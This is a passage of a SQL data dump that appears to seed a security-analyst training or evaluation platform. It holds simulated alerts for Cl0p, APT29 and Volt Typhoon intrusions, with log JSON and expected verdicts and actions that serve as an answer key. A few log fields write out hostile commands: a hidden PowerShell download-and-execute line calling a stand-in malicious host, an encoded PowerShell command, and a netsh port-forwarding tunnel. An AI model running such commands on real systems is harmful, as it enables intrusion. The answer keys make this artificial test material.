tools\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Standard financial document\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User of the affected machine\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(428, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email has been detected targeting key employees, originating from a known malicious IP address associated with the Cl0p ransomware group. The email contains a crafted attachment designed to deploy an initial payload and harvest credentials.', 'Initial Access', 'T1566.001', 1, 'investigating', 49, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"recipient\":\"j.doe@company.com\",\"sender\":\"support@security-update.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update.exe\",\"attachment_hash\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231012083000.123456@company.com>\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p ransomware group.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"Email used in prior spear phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee email address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(429, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the endpoint to download and execute additional payloads, establishing a backdoor for persistent control. This follows a successful phishing attack.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:33Z\",\"event_type\":\"process_creation\",\"host_ip\":\"10.12.34.56\",\"username\":\"johndoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')\",\"file_hash\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"attacker_ip\":\"203.0.113.45\",\"file_name\":\"payload.ps1\",\"process_id\":4521}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor installation scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script executed post-phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(430, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'Cl0p has been observed modifying registry keys to ensure their backdoor persists through system reboots. This technique is used to maintain a foothold in the system and evade basic detection.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:22:35Z\",\"event_id\":4657,\"user\":\"administrator\",\"computer_name\":\"WIN-12AB34CD56\",\"registry_key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malicious.exe\\\"\",\"source_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Threat Database\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used by Cl0p group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(431, 'Credential Dumping in Progress', 'critical', 'Security Information and Event Management (SIEM)', 'With persistence established, Cl0p begins dumping credentials from memory, preparing to infiltrate additional systems within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"process_name\":\"lsass.exe\",\"dump_file\":\"C:\\\\Windows\\\\Temp\\\\dumplog.dmp\",\"hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"event_type\":\"Credential Dumping\",\"message\":\"Credential dumping detected from memory using lsass.exe.\"}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High privilege user account targeted\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"File used for storing dumped credentials\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Expert', 'NULL', 1, 0, NULL),
(432, 'Data Exfiltration via Encrypted Channel', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, Cl0p utilized encrypted channels to exfiltrate sensitive data from the network, leveraging legitimate file transfer protocols such as SFTP to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:30:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.100.87.200\",\"protocol\":\"SFTP\",\"file_name\":\"financial_report_2023.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"encryption\":\"AES256\",\"bytes_transferred\":5242880,\"connection_duration\":360}', '2026-01-04 04:38:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Identified as a command-and-control server associated with Cl0p.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known stolen data set.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(433, 'Suspicious Login Attempts Detected', 'high', 'SIEM', 'Initial access is attempted through a series of password spraying attacks targeting cloud accounts of diplomatic personnel.', 'Password Spraying', 'T1110.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"event_source\":\"cloud.service\",\"event_type\":\"login_attempt\",\"user\":\"diplomat_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"success\":false,\"attempt_count\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\",\"attack_pattern\":\"Password Spraying\",\"associated_hash\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"malicious\":true}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 password spraying campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted cloud account.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"diplomat_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"clean\",\"details\":\"Valid diplomatic personnel cloud account.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(434, 'Unusual Token Usage Pattern', 'high', 'Cloud Access Security Broker (CASB)', 'Anomalous token usage detected following a successful password spraying attack. Stolen tokens were used to bypass MFA, indicating potential privilege escalation attempts.', 'Token Theft', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_source\":\"CASB\",\"event_type\":\"Token Usage\",\"user\":\"jdoe@corporate.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.10.5\",\"token_id\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"file_accessed\":\"/secure/finance_reports/q3_2023.pdf\",\"token_status\":\"anomalous\",\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"context\":\"Token used to access privileged resources without MFA verification\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corporate.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous token usage tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(435, 'Creation of Unauthorized OAuth Applications', 'high', 'Cloud Application Logs', 'An unauthorized OAuth application was created, indicating potential abuse for persistent access to cloud email systems.', 'OAuth Abuse', 'T1550.001 - OAuth Abuse', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"oauth-creation-5678\",\"action\":\"create_oauth_app\",\"user\":\"compromised_user@example.com\",\"application_name\":\"RogueApp\",\"application_id\":\"app-123456789\",\"client_id\":\"client-98765\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"username\":\"compromised_user@example.com\"}}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known OAuth abuse campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(436, 'Lateral Movement Detected in Cloud Environment', 'high', 'Network Traffic Analysis', 'A lateral movement within the cloud infrastructure was detected. The attacker, leveraging existing access, targeted additional diplomatic cloud accounts. Indicators of compromise involved suspicious internal IP communications and unauthorized access from a known malicious IP.', 'Cloud Exploitation', 'T1550.004 - Cloud Instance Metadata API', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:45:32Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.5.23\",\"external_ip\":\"203.0.113.45\",\"user\":\"diplomatic_user_x\",\"action\":\"login_attempt\",\"status\":\"success\",\"hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"filename\":\"malicious_script.sh\",\"description\":\"Detected lateral movement from internal IP 192.168.1.102 to 10.0.5.23 with successful login using diplomatic_user_x. External IP 203.0.113.45 has known malicious activity associated with APT29.\",\"indicator_type\":\"Cloud Exploitation\",\"notable_tool\":\"OAuth Abuse\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT29 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP involved in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"diplomatic_user_x\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(437, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) System', 'In the final stage of the operation, attackers attempted to exfiltrate sensitive diplomatic communications and data. The DLP system detected unusual data transfer activities originating from an internal host to an external IP address associated with known malicious activity.', 'Data Exfiltration', 'T1002: Data Compressed', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"file_transferred\":\"diplomatic_communications.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-20231015-001\",\"description\":\"Unusual data transfer detected to external IP\",\"malware_association\":\"APT29\"}', '2026-01-04 23:55:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"diplomatic_communications.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive diplomatic communications\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 exfiltration tactics\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User within the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(438, 'Unusual PowerShell Execution Detected', 'high', 'SIEM logs', 'Volt Typhoon initiates their campaign by executing obfuscated PowerShell scripts to avoid detection and gather preliminary system information.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":4688,\"host\":{\"hostname\":\"workstation-23\",\"internal_ip\":\"10.0.5.23\",\"os\":\"Windows 10\"},\"user\":{\"username\":\"jdoe\",\"domain\":\"CORP\",\"user_id\":\"S-1-5-21-123456789-123456789-123456789-1001\"},\"process\":{\"pid\":4567,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\"},\"network\":{\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.15\",\"destination_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"recon.ps1\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\recon.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}}', '2026-01-04 23:57:09', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Volt Typhoon\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as part of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution for user profile\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(439, 'Suspicious WMI Activity Spotted', 'high', 'Endpoint detection and response (EDR) alerts', 'The attackers leverage WMI to create persistent footholds, enabling them to execute scripts remotely whenever the system restarts. Detected WMI subscription creation on host with persistent script execution capabilities.', 'Persistence', 'T1084', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:32:45Z\",\"event_id\":\"4624\",\"host_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"wmi_class\":\"ActiveScriptEventConsumer\",\"wmi_filter\":\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_Process\'\",\"wmi_consumer\":\"malicious_script.js\",\"hash\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"description\":\"WMI subscription detected for persistent access\",\"process\":\"wmiprvse.exe\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used in APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Script used in attacks for remote execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_account_audit\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(440, 'Anomalous netsh Configuration Changes', 'high', 'Network traffic analysis', 'Detected suspicious netsh configuration changes potentially used for creating tunnels across the network. This activity is consistent with lateral movement tactics employed by the Volt Typhoon APT group.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_type\":\"network\",\"source_ip\":\"10.0.3.45\",\"destination_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"netsh interface portproxy add v4tov4 listenport=3389 listenaddress=10.0.3.45 connectport=3389 connectaddress=192.168.1.100\",\"process_name\":\"netsh.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"netsh.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP used in suspicious netsh command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by netsh command.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Volt Typhoon activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Known hash for netsh.exe, legitimate system utility.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL),
(441, 'Unexpected Remote Desktop Protocol (RDP) Sessions', 'high', 'RDP logs', 'An unauthorized remote session was detected from an external IP address, indicating a potential lateral movement attempt. The session accessed a high-value system within the network, suggesting an advanced attempt to expand network foothold.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:53Z\",\"event_id\":\"4624\",\"logon_type\":10,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"logon_guid\":\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\",\"transmitted_services\":\"-\",\"lm_package_name\":\"NTLM\",\"key_length\":128}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', 